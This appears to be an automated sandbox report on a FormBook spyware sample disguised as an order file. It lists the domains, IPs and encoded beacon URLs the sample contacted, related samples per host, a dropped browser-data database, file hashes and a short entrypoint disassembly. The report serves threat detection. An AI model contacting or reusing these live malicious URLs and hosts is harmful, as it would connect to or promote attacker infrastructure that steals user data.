              http://www.promocao.info/zaz4/?60q4=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhhp4qHBhxLTG4/9m9WNTMgvCUOuzK4Dd8hoTr25U9f7tIQ==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://cifasnc.info/xmlrpc.php0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?XxGx=INH0eLoh&60q4=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhz8HJcA2kRlIFQIbzI/ZykrVSnU5kYfD/4QtIXIX4MBGxA==0%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/?60q4=KXKmlftrGUnNwN7yhNFRHhuh5Rs4DPRuyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NOYW1ed+75fZ9khrC38pBidS91YBqsB3/Rw22POvSz2t7Q==&XxGx=INH0eLoh0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              nosolofichas.online
              		84.32.84.32
              		truetrue
                		unknown
                www.moyu19.pro
                		154.39.239.237
                		truetrue
                  		unknown
                  dns.ladipage.com
                  		13.228.81.39
                  		truefalse
                    		high
                    www.cifasnc.info
                    		188.114.96.3
                    		truefalse
                      		high
                      promocao.info
                      		84.32.84.32
                      		truetrue
                        		unknown
                        www.grimbo.boats
                        		104.21.18.171
                        		truefalse
                          		high
                          www.lonfor.website
                          		199.192.21.169
                          		truefalse
                            		high
                            www.denture-prices.click
                            		199.59.243.228
                            		truetrue
                              		unknown
                              www.gayhxi.info
                              		47.83.1.90
                              		truefalse
                                		high
                                www.investshares.net
                                		154.197.162.239
                                		truefalse
                                  		high
                                  zcdn.8383dns.com
                                  		134.122.135.48
                                  		truefalse
                                    		high
                                    www.adadev.info
                                    		47.83.1.90
                                    		truetrue
                                      		unknown
                                      www.ebsmadrid.store
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.nosolofichas.online
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.sonixingenuine.shop
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.jrcov55qgcxp5fwa.top
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.promocao.info
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.44756.pizza
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.grimbo.boats/kxtt/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.investshares.net/cf9p/?60q4=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK8besZipepVANv+t7hBu9DYDfOtNcbRzWTW+UxqRkwAygg==&XxGx=INH0eLohtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.gayhxi.info/k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLohtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.44756.pizza/a59t/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lonfor.website/bowc/?XxGx=INH0eLoh&60q4=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+9x4X9y8Z/5Ky7IaWcKrL+RZ/80JfAgkwuEz7OkyFGBk9g==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.44756.pizza/a59t/?60q4=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acut6Rdyu+TCEGVVLJHlB4H68wm+9nMwlD43slzfYSOf5Syg==&XxGx=INH0eLohtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.adadev.info/ctdy/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReFoBqhl5n3/gZ7z43FPL8v6UGlzjHBkbB1lRKGmkyDfNsg==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.denture-prices.click/dx3i/?60q4=d8Ky6hmePKhU2XxCZcorJpWfFstOvl7w2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdGjvy0c7sWjSWanGPqhflfgeWepWZ17tVEIX5zsWYbAgUQ==&XxGx=INH0eLohtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nosolofichas.online/hqr6/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.investshares.net/cf9p/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.promocao.info/zaz4/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nosolofichas.online/hqr6/?60q4=zX0jw1Jb7ql8GILmYUO6wMs9InQYjg93TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfeyls16INcIZma1Jpk987Wy75kHMsLzMhDfgt4WvdaOefQ==&XxGx=INH0eLohtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.moyu19.pro/b9e2/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lonfor.website/bowc/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.adadev.info/ctdy/?XxGx=INH0eLoh&60q4=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFRMH0zJP+kybsKdAAfaCKHAM6Zo7ldb4F8fWSMfSKwbdMw==true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.sonixingenuine.shop/01c7/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cifasnc.info/8rr3/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6lv1Dk2KgOeGcWS57RgWwvqcZEoOC4yFjEhnf2QufT28mA==&XxGx=INH0eLohtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.grimbo.boats/kxtt/?XxGx=INH0eLoh&60q4=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhz8HJcA2kRlIFQIbzI/ZykrVSnU5kYfD/4QtIXIX4MBGxA==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.promocao.info/zaz4/?60q4=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhhp4qHBhxLTG4/9m9WNTMgvCUOuzK4Dd8hoTr25U9f7tIQ==&XxGx=INH0eLohtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.denture-prices.click/dx3i/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.moyu19.pro/b9e2/?60q4=KXKmlftrGUnNwN7yhNFRHhuh5Rs4DPRuyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NOYW1ed+75fZ9khrC38pBidS91YBqsB3/Rw22POvSz2t7Q==&XxGx=INH0eLohtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabfc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.moyu19.proXcmmvCqVSCAb.exe, 00000007.00000002.3864456444.0000000004E05000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWgfc.exe, 00000004.00000002.3864506422.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003B86000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1tofc.exe, 00000004.00000002.3864506422.000000000539C000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.000000000403C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ac.ecosia.org/autocomplete?q=fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.google.comfc.exe, 00000004.00000002.3864506422.000000000520A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3866047110.0000000006420000.00000004.00000800.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003EAA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://cifasnc.info/xmlrpc.phpfc.exe, 00000004.00000002.3864506422.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003B86000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      154.197.162.239
                                                                      		www.investshares.netSeychelles
                                                                      		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                      104.21.18.171
                                                                      		www.grimbo.boatsUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      199.192.21.169
                                                                      		www.lonfor.websiteUnited States
                                                                      		22612NAMECHEAP-NETUSfalse
                                                                      47.83.1.90
                                                                      		www.gayhxi.infoUnited States
                                                                      		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                                      188.114.96.3
                                                                      		www.cifasnc.infoEuropean Union
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      84.32.84.32
                                                                      		nosolofichas.onlineLithuania
                                                                      		33922NTT-LT-ASLTtrue
                                                                      13.228.81.39
                                                                      		dns.ladipage.comUnited States
                                                                      		16509AMAZON-02USfalse
                                                                      199.59.243.228
                                                                      		www.denture-prices.clickUnited States
                                                                      		395082BODIS-NJUStrue
                                                                      154.39.239.237
                                                                      		www.moyu19.proUnited States
                                                                      		174COGENT-174UStrue
                                                                      134.122.135.48
                                                                      		zcdn.8383dns.comUnited States
                                                                      		64050BCPL-SGBGPNETGlobalASNSGfalse

                                                                      General Information

                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1590082
                                                                      Start date and time:2025-01-13 15:10:12 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 46s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:9
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:2
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:New Order#12125.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/1@16/10
                                                                      EGA Information:
                                                                      • Successful, ratio: 80%
                                                                      HCA Information:
                                                                      • Successful, ratio: 87%
                                                                      • Number of executed functions: 14
                                                                      • Number of non-executed functions: 329
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212
                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      09:12:26API Interceptor10619846x Sleep call for process: fc.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      154.197.162.239CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      104.21.18.171CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/kxtt/
                                                                      Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/mjs1/
                                                                      smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/ej4l/
                                                                      PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/kxtt/
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/kxtt/
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/kxtt/
                                                                      SecuriteInfo.com.Variant.Tedy.130342.18814.exeGet hashmaliciousFormBookBrowse
                                                                      • www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx
                                                                      199.192.21.169CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • www.lonfor.website/bowc/
                                                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                      • www.bokus.site/qps0/
                                                                      Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                      • www.sesanu.xyz/rf25/
                                                                      CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • www.lonfor.website/bowc/
                                                                      plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                      • www.astrafusion.xyz/pcck/
                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                      • www.bokus.site/qps0/
                                                                      QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                      • www.bokus.site/qps0/
                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                      • www.bokus.site/qps0/
                                                                      ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.solidf.xyz/stho/
                                                                      DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                      • www.lonfor.website/stiu/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      dns.ladipage.comCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      BLv4mI7zzY.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      www.moyu19.proCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.39.239.237
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.39.239.237
                                                                      www.cifasnc.infoCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.96.3
                                                                      KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.96.3
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.97.3
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.97.3
                                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.128.109
                                                                      bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                      • 172.67.128.109

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUShttps://melioeftpayments.cloudfilesbureau.com/2pVvUGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.18.171
                                                                      tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.32.1
                                                                      https://deltacapoffers.com/prequalification.php?utm_source=klayvio&utm_medium=email&utm_campaign=scrapeddripcampaign&utm_id=efi&utm_term=efi&utm_content=scrapedlists6&_kx=YFJgSt5YAM6jpJldJ4ZDop7CB1jVRJhqJKw59Uk4HMU.QZibAuGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      http://organismekina8at-my.sharepoint.com/:f:/g/personal/mariejoelle_tremblay_kina8at_ca/ErWnJRn_SWBKkEcx4yGorhMBtA4m6tEq5cYuHnwwp_z1SwGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      http://id1223.adsalliance.xyzGet hashmaliciousUnknownBrowse
                                                                      • 162.247.243.29
                                                                      Cardfactory Executed Agreement DocsID- Sign & Review..emlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.11.207
                                                                      http://unioneconselvano.it/0kktkM-VkjxP-cvXwg-XC4J3-7f72j-pfTsY-7uK529r.phpGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      https://www.google.ca/url?subgn1=https://www.fordbeckerandgutierrez.com&SQ=WA&SQ=F5&SQ=R7&TA=W4&SQ=L6&q=%2561%256d%2570%2F%2573%256D%2569%2568%256B%2538%252E%2564%2565%256B%2563%2568%256F%2562%2574%2569%2565%2577%252E%2563%256F%256D%252F%256A%2576%2561%256E%256E%2561%2574%2574%2565%256E%2540%2561%2572%2572%256F%2577%2562%2561%256E%256B%252E%2563%256F%256D&opdg=ejM&cFQ=QXo&STA=MHYGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.17.245.203
                                                                      COMING-ASABCDEGROUPCOMPANYLIMITEDHKCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      http://38133.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                                                      • 156.224.208.119
                                                                      http://40608.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                                                      • 156.224.208.119
                                                                      emips.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.250.110.142
                                                                      PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      VODANETInternationalIP-BackboneofVodafoneDECSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 47.83.1.90
                                                                      elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 92.208.12.103
                                                                      elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 188.100.79.179
                                                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                      • 47.83.1.90
                                                                      CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 47.83.1.90
                                                                      1001-13.exeGet hashmaliciousFormBookBrowse
                                                                      • 47.83.1.90
                                                                      6.elfGet hashmaliciousUnknownBrowse
                                                                      • 92.73.125.182
                                                                      6.elfGet hashmaliciousUnknownBrowse
                                                                      • 47.82.15.239
                                                                      res.arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 84.61.102.254
                                                                      res.x86.elfGet hashmaliciousUnknownBrowse
                                                                      • 178.9.17.19
                                                                      NAMECHEAP-NETUSCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 198.54.116.113
                                                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                      • 68.65.122.71
                                                                      CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      1001-13.exeGet hashmaliciousFormBookBrowse
                                                                      • 162.0.236.169
                                                                      QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 199.192.23.123
                                                                      rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.23.123
                                                                      plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.23.123

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Temp\17O3k-2I

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\fc.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.634842562323749
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:New Order#12125.exe
                                                                      File size:333'824 bytes
                                                                      MD5:2a0dfbfc319b0082f4fcdc47317e7f23
                                                                      SHA1:82f2785464db11931b8653f349a7d0b62502c1c5
                                                                      SHA256:a117f2f0d37c6e467b308cb625140d64edab045f59a422c2c7ae671098a52748
                                                                      SHA512:4d9d80eda52a4e1fefe823b86666674ebc6340d8646d1699c6d337328f5b012e50da4e7e6c1aa9b965eb2125be979b81badf94c7208eeba833dcad01764af616
                                                                      SSDEEP:6144:s8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3roN6WL:u/dhQJqiOKsPDOZLGeDk3rk
                                                                      TLSH:6764121A5F25E202C4FD2A73796F4B4276794B2EBD192B11B4493CA65CA0C7F6EC03B1
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...................p....@................

                                                                      File Icon

                                                                      Icon Hash:73bc6156248d94a6

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x401580
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000424h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      push 0000040Ch
                                                                      lea eax, dword ptr [ebp-00000420h]
                                                                      push 00000000h
                                                                      push eax
                                                                      mov dword ptr [ebp-00000424h], 00000000h
                                                                      call 00007F67A853713Ch
